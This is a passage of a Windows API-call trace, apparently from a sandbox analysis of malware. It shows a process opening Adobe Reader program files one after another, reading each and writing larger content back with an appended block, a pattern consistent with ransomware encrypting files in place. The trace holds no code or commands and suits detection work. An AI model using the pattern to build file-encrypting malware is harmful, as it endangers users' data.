CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_SLV\\QuickTime.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_slv\\quicktime.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.257] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.257] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.258] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.258] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.258] ReleaseMutex (hMutex=0x168) returned 1 [0083.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SLV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.SLV", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.SLV", lpUsedDefaultChar=0x0) returned 13 [0083.258] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.260] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.260] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.261] CloseHandle (hObject=0x1e4) returned 1 [0083.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_UKR\\QuickTime.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_ukr\\quicktime.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.262] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.262] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0083.262] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.262] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.262] ReleaseMutex (hMutex=0x168) returned 1 [0083.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.UKR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.UKR", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.UKR", lpUsedDefaultChar=0x0) returned 13 [0083.263] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.265] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.265] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.265] CloseHandle (hObject=0x1e4) returned 1 [0083.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Search.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\search.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.267] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.267] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x69063 [0083.267] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.267] ReleaseMutex (hMutex=0x168) returned 1 [0083.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.api", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.api", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.api", lpUsedDefaultChar=0x0) returned 10 [0083.268] ReadFile (in: hFile=0x1e4, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0083.789] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x68063 [0083.789] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.791] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x68063 [0083.792] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.792] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0083.792] WriteFile (in: hFile=0x1e4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0083.793] CloseHandle (hObject=0x1e4) returned 1 [0083.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\drvDX9.x3d" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\drvdx9.x3d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.794] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.794] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xc6f90 [0083.794] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.794] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.795] ReleaseMutex (hMutex=0x168) returned 1 [0083.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvDX9.x3d", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="drvDX9.x3d", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="drvDX9.x3d", lpUsedDefaultChar=0x0) returned 10 [0083.795] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.797] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.798] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc5f90 [0083.798] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.800] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xc5f90 [0083.801] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.802] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0083.802] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.802] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.803] CloseHandle (hObject=0x1e4) returned 1 [0083.803] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Services\\DEXShare.spi" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\services\\dexshare.spi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.805] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.805] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x101bc5 [0083.805] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.806] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.806] ReleaseMutex (hMutex=0x168) returned 1 [0083.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.spi", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.spi", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.spi", lpUsedDefaultChar=0x0) returned 12 [0083.806] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0083.808] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.809] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x100bc5 [0083.810] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0083.813] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x100bc5 [0083.813] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0083.814] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0083.814] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0083.816] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0083.816] CloseHandle (hObject=0x1e4) returned 1 [0083.817] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\email_all.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\email_all.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.817] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.818] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x5a3 [0083.818] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.818] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.818] ReleaseMutex (hMutex=0x168) returned 1 [0083.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="email_all.gif", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="email_all.gif", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="email_all.gif", lpUsedDefaultChar=0x0) returned 13 [0083.818] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x5a3, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x5a3, lpOverlapped=0x0) returned 1 [0083.820] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.821] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea9eb8*, nNumberOfBytesToWrite=0xb2b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea9eb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xb2b, lpOverlapped=0x0) returned 1 [0083.821] CloseHandle (hObject=0x1e4) returned 1 [0083.821] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\info.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\info.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.824] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.824] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x242 [0083.824] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.824] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.825] ReleaseMutex (hMutex=0x168) returned 1 [0083.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info.gif", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0083.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info.gif", cchWideChar=8, lpMultiByteStr=0x1f7358c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info.gif", lpUsedDefaultChar=0x0) returned 8 [0083.825] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x242, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2b1f2bc*=0x242, lpOverlapped=0x0) returned 1 [0083.828] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.828] WriteFile (in: hFile=0x1e4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7ca, lpOverlapped=0x0) returned 1 [0083.829] CloseHandle (hObject=0x1e4) returned 1 [0083.829] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_browser.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_browser.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.830] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.830] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x47f [0083.830] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.830] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.831] ReleaseMutex (hMutex=0x168) returned 1 [0083.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_browser.gif", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0083.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_browser.gif", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="review_browser.gif", lpUsedDefaultChar=0x0) returned 18 [0083.831] ReadFile (in: hFile=0x1e4, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x47f, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2b1f2bc*=0x47f, lpOverlapped=0x0) returned 1 [0083.954] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.955] WriteFile (in: hFile=0x1e4, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0xa07, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa07, lpOverlapped=0x0) returned 1 [0083.955] CloseHandle (hObject=0x1e4) returned 1 [0083.955] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\stop_collection_data.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\stop_collection_data.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0083.957] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.957] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x393 [0083.957] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0083.957] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.958] ReleaseMutex (hMutex=0x168) returned 1 [0083.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop_collection_data.gif", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0083.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="stop_collection_data.gif", cchWideChar=24, lpMultiByteStr=0x1f8fc0c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stop_collection_data.gif", lpUsedDefaultChar=0x0) returned 24 [0083.958] ReadFile (in: hFile=0x1e4, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x393, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2b1f2bc*=0x393, lpOverlapped=0x0) returned 1 [0083.960] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0083.960] WriteFile (in: hFile=0x1e4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x91b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x91b, lpOverlapped=0x0) returned 1 [0083.960] 